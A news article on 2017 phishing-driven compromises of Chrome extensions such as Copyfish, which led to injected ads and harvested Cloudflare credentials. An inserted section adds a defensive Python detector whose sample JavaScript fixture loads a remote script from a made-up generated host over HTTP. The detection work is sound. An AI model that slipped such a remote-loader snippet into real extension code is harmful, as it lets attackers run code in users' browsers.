Seven more Google Chrome Extensions face hacker attacks

by Ugnius Kiguolis

This month has not been a good one for Chrome, as its extensions have suffered multiple attacks.[1] The first attack, carried out on August 1, targeted the OCR add-on Copyfish (2.8.5).[2] Chrome users were the unlucky ones, since the attack affected only the Google Chrome extension and did no damage to the extensions for other browsers. Over 30 000 users had their browsing disrupted by intrusive ads.

The sad thing is that not every user will notice that something is wrong. These days people are used to huge amounts of ads when watching videos or simply reading the news, so even a sharp increase may not prompt them to act or to report the situation.

To make matters worse, many more Chrome extensions were hit by other cyber attacks. The main symptoms of an attack are an unusually high number of advertisements displayed and manipulation of online traffic.[3] The affected extensions are not safe to use because of the increased level of cyber threats tied to suspicious and illegal advertising.

The newly infected extensions include Chrometana (1.1.3), Web Developer (0.4.9), Social Fixer (20.1.1), Infinity New Tab (3.12.3), and Web Paint (1.2.1).[4] Even Virtual Private Network (VPN)[5] extensions weren’t left alone – it is believed that Chrome extensions Betternet VPN and TouchVPN had their security compromised in June.

The original Copyfish attack was carried out by deceiving its developers at A9t9 Software. They received an email stating that their extension was no longer suitable for the market and would be removed unless it was updated.

The email included a link that promised more information to those who clicked it. An unsuspecting developer followed the link and entered their Google Account password.

This was a grave mistake: the hackers now had the password and could freely modify the extension's code, as well as distribute the newly infected versions of the software online.

These phishing attacks[6] all follow the same pattern – developers are tricked into exposing their Google Account credentials, which the hackers then use to access the accounts and inject modified code into the extensions.

Malicious advertisements and dangerous pop-ups are then inserted to redirect traffic and potentially infect users' computers with malware, which can do a great deal of damage on its own.

One of the malicious activities of the infected Copyfish extension was replacing all ads with its own, exposing the user to many kinds of threats. One type of ad was designed to trick people into thinking they needed to repair their computer. It was a particular JavaScript advertisement that redirected users to pages and programs used to generate profit for the attackers.

Luckily, Proofpoint (a cyber security leader) managed to resolve the situation by removing the maliciously injected code. Analysis of the threatening code showed that a remote file named ga.js was retrieved over HTTP, and that the domain of the server it was retrieved from had been generated by a domain generation algorithm.

This allowed the hackers to call additional scripts, some of which harvested Cloudflare credentials. With those credentials in the attackers' hands, Cloudflare's protection was no longer effective, and the attackers could replace all the ads.
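As an added illustration (not code from the article, from Proofpoint's analysis, or from any of the extensions named), here is a small Python checker a defender could run over an extension's unpacked JavaScript to flag the two indicators the analysis above describes: remote resources loaded over plain HTTP, and hostnames that look algorithmically generated. The sample snippet and its hostname are constructed for the example, and the entropy, length and vowel-ratio thresholds in `looks_generated` are assumptions chosen for illustration rather than a published detection rule.

```python
import math
import re
from urllib.parse import urlparse

# Constructed sample (not real Copyfish code): a snippet in the shape the
# article describes, loading a remote "ga.js" over plain HTTP from a hostname
# that looks algorithmically generated. The hostname is made up and uses the
# reserved ".example" TLD; the second URL stands in for a legitimate API call.
SAMPLE_EXTENSION_JS = """
var s = document.createElement('script');
s.src = 'http://q7zj3kx9wb.example/ga.js';
document.head.appendChild(s);
fetch('https://api.example.com/ocr');
"""

# Matches http(s) URLs up to the first whitespace, quote, angle bracket or ')'.
URL_RE = re.compile(r"""https?://[^\s'"<>)]+""")


def shannon_entropy(text):
    """Bits of entropy per character of `text` (0.0 for an empty string)."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def looks_generated(label, min_len=8, min_entropy=3.0, max_vowel_ratio=0.25):
    """Heuristic DGA check on a single hostname label.

    Assumed thresholds: generated labels tend to be long, high-entropy and
    vowel-poor compared with dictionary words. A production DGA classifier
    would use richer features and training data; this is only a triage aid.
    """
    if len(label) < min_len:
        return False
    vowels = sum(1 for ch in label.lower() if ch in "aeiou")
    return (shannon_entropy(label) >= min_entropy
            and vowels / len(label) <= max_vowel_ratio)


def find_suspicious_loads(js_source, allowlist=()):
    """Return [(url, [reasons])] for remote resources that deserve review.

    Two indicators are checked, both taken from the analysis in the article:
    the resource is fetched over plain HTTP (tamperable in transit), or the
    first hostname label looks like DGA output. Hosts in `allowlist` are
    skipped so known-good infrastructure does not drown out real findings.
    """
    findings = []
    for match in URL_RE.finditer(js_source):
        url = match.group(0)
        host = urlparse(url).hostname or ""
        if not host or host in allowlist:
            continue
        reasons = []
        if url.lower().startswith("http://"):
            reasons.append("plain HTTP")
        if looks_generated(host.split(".")[0]):
            reasons.append("DGA-like hostname")
        if reasons:
            findings.append((url, reasons))
    return findings


if __name__ == "__main__":
    for url, reasons in find_suspicious_loads(SAMPLE_EXTENSION_JS):
        print(f"{url}: {', '.join(reasons)}")
```

Run against the constructed sample, the checker reports only the `ga.js` load, with both reasons attached, and stays silent on the HTTPS API call. In practice a reviewer would point it at every `.js` file in the unpacked extension directory and compare the hostnames it surfaces with the extension's declared permissions and the developer's known infrastructure.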

Given that Cloudflare credentials have been harvested multiple times, it is not far-fetched to expect more similar cyber attacks in the future.

About the author

Ugnius Kiguolis - Team leader

Ugnius Kiguolis is an IT specialist, the team leader, and the founder of He has worked in the IT area for over 20 years.
